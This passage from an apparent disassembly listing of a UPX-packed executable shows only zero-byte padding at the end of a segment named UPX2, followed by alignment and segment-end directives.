UPX2:00408192                 db    0 ;  
UPX2:00408193                 db    0 ;  
UPX2:00408194                 db    0 ;  
UPX2:00408195                 db    0 ;  
UPX2:00408196                 db    0 ;  
UPX2:00408197                 db    0 ;  
UPX2:00408198                 db    0 ;  
UPX2:00408199                 db    0 ;  
UPX2:0040819A                 db    0 ;  
UPX2:0040819B                 db    0 ;  
UPX2:0040819C                 db    0 ;  
UPX2:0040819D                 db    0 ;  
UPX2:0040819E                 db    0 ;  
UPX2:0040819F                 db    0 ;  
UPX2:004081A0                 db    0 ;  
UPX2:004081A1                 db    0 ;  
UPX2:004081A2                 db    0 ;  
UPX2:004081A3                 db    0 ;  
UPX2:004081A4                 db    0 ;  
UPX2:004081A5                 db    0 ;  
UPX2:004081A6                 db    0 ;  
UPX2:004081A7                 db    0 ;  
UPX2:004081A8                 db    0 ;  
UPX2:004081A9                 db    0 ;  
UPX2:004081AA                 db    0 ;  
UPX2:004081AB                 db    0 ;  
UPX2:004081AC                 db    0 ;  
UPX2:004081AD                 db    0 ;  
UPX2:004081AE                 db    0 ;  
UPX2:004081AF                 db    0 ;  
UPX2:004081B0                 db    0 ;  
UPX2:004081B1                 db    0 ;  
UPX2:004081B2                 db    0 ;  
UPX2:004081B3                 db    0 ;  
UPX2:004081B4                 db    0 ;  
UPX2:004081B5                 db    0 ;  
UPX2:004081B6                 db    0 ;  
UPX2:004081B7                 db    0 ;  
UPX2:004081B8                 db    0 ;  
UPX2:004081B9                 db    0 ;  
UPX2:004081BA                 db    0 ;  
UPX2:004081BB                 db    0 ;  
UPX2:004081BC                 db    0 ;  
UPX2:004081BD                 db    0 ;  
UPX2:004081BE                 db    0 ;  
UPX2:004081BF                 db    0 ;  
UPX2:004081C0                 db    0 ;  
UPX2:004081C1                 db    0 ;  
UPX2:004081C2                 db    0 ;  
UPX2:004081C3                 db    0 ;  
UPX2:004081C4                 db    0 ;  
UPX2:004081C5                 db    0 ;  
UPX2:004081C6                 db    0 ;  
UPX2:004081C7                 db    0 ;  
UPX2:004081C8                 db    0 ;  
UPX2:004081C9                 db    0 ;  
UPX2:004081CA                 db    0 ;  
UPX2:004081CB                 db    0 ;  
UPX2:004081CC                 db    0 ;  
UPX2:004081CD                 db    0 ;  
UPX2:004081CE                 db    0 ;  
UPX2:004081CF                 db    0 ;  
UPX2:004081D0                 db    0 ;  
UPX2:004081D1                 db    0 ;  
UPX2:004081D2                 db    0 ;  
UPX2:004081D3                 db    0 ;  
UPX2:004081D4                 db    0 ;  
UPX2:004081D5                 db    0 ;  
UPX2:004081D6                 db    0 ;  
UPX2:004081D7                 db    0 ;  
UPX2:004081D8                 db    0 ;  
UPX2:004081D9                 db    0 ;  
UPX2:004081DA                 db    0 ;  
UPX2:004081DB                 db    0 ;  
UPX2:004081DC                 db    0 ;  
UPX2:004081DD                 db    0 ;  
UPX2:004081DE                 db    0 ;  
UPX2:004081DF                 db    0 ;  
UPX2:004081E0                 db    0 ;  
UPX2:004081E1                 db    0 ;  
UPX2:004081E2                 db    0 ;  
UPX2:004081E3                 db    0 ;  
UPX2:004081E4                 db    0 ;  
UPX2:004081E5                 db    0 ;  
UPX2:004081E6                 db    0 ;  
UPX2:004081E7                 db    0 ;  
UPX2:004081E8                 db    0 ;  
UPX2:004081E9                 db    0 ;  
UPX2:004081EA                 db    0 ;  
UPX2:004081EB                 db    0 ;  
UPX2:004081EC                 db    0 ;  
UPX2:004081ED                 db    0 ;  
UPX2:004081EE                 db    0 ;  
UPX2:004081EF                 db    0 ;  
UPX2:004081F0                 db    0 ;  
UPX2:004081F1                 db    0 ;  
UPX2:004081F2                 db    0 ;  
UPX2:004081F3                 db    0 ;  
UPX2:004081F4                 db    0 ;  
UPX2:004081F5                 db    0 ;  
UPX2:004081F6                 db    0 ;  
UPX2:004081F7                 db    0 ;  
UPX2:004081F8                 db    0 ;  
UPX2:004081F9                 db    0 ;  
UPX2:004081FA                 db    0 ;  
UPX2:004081FB                 db    0 ;  
UPX2:004081FC                 db    0 ;  
UPX2:004081FD                 db    0 ;  
UPX2:004081FE                 db    0 ;  
UPX2:004081FF                 db    0 ;  
UPX2:00408200                 align 1000h
UPX2:00408200 UPX2            ends
UPX2:00408200 
UPX2:00408200 
UPX2:00408200                 end start



